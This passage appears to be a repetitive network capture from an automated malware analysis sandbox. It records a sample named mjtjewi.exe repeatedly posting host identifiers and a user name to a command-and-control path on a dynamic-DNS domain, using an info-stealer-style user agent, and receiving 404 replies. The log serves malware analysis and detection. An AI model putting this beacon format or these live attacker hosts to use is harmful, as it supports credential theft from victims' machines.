                                                        Oct 3, 2024 09:21:29.591806889 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:30.259722948 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:29 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.116438445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:30.408480883 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:30.413511038 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:31.213476896 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:30 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.116438545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:31.493468046 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:31.498785019 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:32.591485977 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:31 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.
                                                        Oct 3, 2024 09:21:32.591620922 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:31 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.116438645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:32.738049984 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:32.743030071 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:33.386100054 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:32 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.116438745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:33.551290035 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:33.556186914 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:35.070835114 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:33 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.
                                                        Oct 3, 2024 09:21:35.071057081 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:33 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.
                                                        Oct 3, 2024 09:21:35.071317911 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:33 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.116438845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:35.234649897 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:35.239656925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:46.491751909 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:37 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.116438945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:46.642540932 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:46.647500992 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:47.323739052 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:46 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.116439045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:47.482239008 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:47.487101078 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:48.280944109 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:47 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.116439145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:48.435915947 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:48.440835953 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:49.089157104 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:48 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.116439245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:49.253714085 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:49.258711100 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:50.342468977 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:49 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.
                                                        Oct 3, 2024 09:21:50.342633009 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:49 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.116439345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:50.494801044 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:50.499694109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:51.137919903 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:50 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.116439445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:51.282442093 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:51.287565947 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:51.987176895 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:51 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.116439545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:52.143836975 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:52.148747921 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:52.824364901 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:52 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.116439645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:52.975395918 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:52.981934071 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:53.812876940 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:53 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.116439745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:53.998188972 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:54.007169008 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:54.779628992 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:54 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.116439845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:54.934883118 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:54.945255995 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:55.743837118 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:55 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.116439945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:55.903311968 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:55.920208931 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:57.049427986 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:56 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.116440045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:57.211874008 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:57.220849991 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:58.009134054 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:57 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.116440145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:58.166697025 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:58.171911955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
